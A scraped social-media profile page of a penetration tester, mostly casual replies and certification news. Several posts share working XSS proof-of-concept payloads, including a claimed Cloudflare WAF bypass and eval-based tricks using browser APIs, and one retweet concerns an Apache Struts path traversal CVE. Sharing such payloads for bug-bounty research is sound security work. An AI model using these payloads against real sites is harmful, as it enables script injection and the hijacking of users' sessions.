grumpzsux Profile Banner
Sergio Medeiros Profile
Sergio Medeiros

@grumpzsux

Followers
4K
Following
4K
Statuses
900

|| Penetration Tester @ Synack || eWPTXv2, CAPenX, CAPen, eWPT, eCPPTv2 , eJPT certified. Opinions are my own. || #bugbounty #bugbountytips #cybersecurity

San Jose, CA
Joined June 2020
Don't wanna be here? Send us removal request.
@grumpzsux
Sergio Medeiros
7 days
@JackRhysider Hahaha big facts πŸ’―
0
0
1
@grumpzsux
Sergio Medeiros
9 days
@BadAt_Computers Grind it out! πŸ’ͺ🏼
0
0
1
@grumpzsux
Sergio Medeiros
10 days
@G0LDEN_infosec I tend to switch gears, maybe it’s 0day hunting, writing articles to help new comers etc, eventually it reignites my motivation to hunt.
0
0
2
@grumpzsux
Sergio Medeiros
10 days
@rez0__ I agree, but Vietnam πŸ‡»πŸ‡³ is definitely at the top my list personally as well.
0
0
4
@grumpzsux
Sergio Medeiros
17 days
Read more about reportError() here
0
0
5
@grumpzsux
Sergio Medeiros
23 days
@phyr3wall It’s back now lol
0
0
0
@grumpzsux
Sergio Medeiros
1 month
🚨 #XSS Payload CloudFlare Bypass by @Team_R70 <img longdesc="src='x'onerror=alert(document.domain);//><img " src='showme'> #bugbountytips #BugBounty #bugbountytip #HackTheBox
1
2
8
@grumpzsux
Sergio Medeiros
2 months
@m1ke_n1
Mikhail Klyuchnikov
2 months
⚠️CVE-2024-53677 in Apache Struts: Path Traversal allows uploading files to arbitrary locations. Updating to Struts >6.4.0 is not enough if you’re still using FileUploadInterceptor. Great write-up by @Y4tacker! Details + PoC ⬇️
Tweet media one
0
1
5
@grumpzsux
Sergio Medeiros
2 months
@0xTib3rius @albinowax That’s my pet peeve right there, absolutely have to sort it that way too!
0
0
0
@grumpzsux
Sergio Medeiros
2 months
πŸ’ͺ🏼
0
0
0
@grumpzsux
Sergio Medeiros
3 months
@0xSabir @TheSecOpsGroup Sure, DM me with any questions you have.
0
0
0
@grumpzsux
Sergio Medeiros
3 months
Proud to announce that I have obtained the CAPenX - Certified AppSec Pentesting eXpert certification by @TheSecOpsGroup - Definitely a tough one! But loved the modern attack vectors. #BugBounty #HackTheBox #appsec #bugbountytips #cybersecurity
Tweet media one
0
0
7
@grumpzsux
Sergio Medeiros
3 months
πŸš€ XSS Trick of the Day! πŸš€ πŸ’‘ EyeDropper API: Open the color picker with a surprise twist! πŸ–ŒοΈ new EyeDropper().open().catch(()=>alert(1)) πŸ‘‰ If unsupported, the catch block triggers alert(1) instead! (chrome only)⚠️ #Cybersecurity #JavaScript #BugBountyTips #XSS #WebSecurity πŸ‘Ύ
0
2
9
@grumpzsux
Sergio Medeiros
3 months
@NahamSec Don’t assume that since a listing is old that everything has been found. In-depth enumeration will open a lot of doors.
0
0
4
@grumpzsux
Sergio Medeiros
4 months
@iAnonPatriot I’m smack in the middle of Silicon Valley and voted for trump.
0
0
2
@grumpzsux
Sergio Medeiros
4 months
πŸš¨πŸ’‘ XSS via SharedArrayBuffer! Here’s how to encode and execute malicious payloads with buffer manipulation! πŸ”πŸ§‘β€πŸ’» let encoder = new TextEncoder(); let buf = new Uint8Array(8); encoder.encodeInto('alert(1)', buf); eval(String.fromCharCode(...buf)); Encode, buffer, execute, repeat! πŸš€ Time to level up your XSS skills! πŸ’£ #XSS #BugBounty #BugBountyTips #WebSecurity #CyberSecurity
1
1
4
@grumpzsux
Sergio Medeiros
4 months
πŸš¨πŸ”” XSS via Notification.permission API! Wanna pop an alert when permissions are granted? πŸ‘€ Here’s a clever payload: Notification.requestPermission().then(() => eval('alert(1)')); Get permission, get execution! πŸ”₯ Perfect for hunting those tricky bugs! πŸ›πŸ’‘ #XSS #BugBounty #WebSecurity #JavaScript #CyberSecurity
0
1
5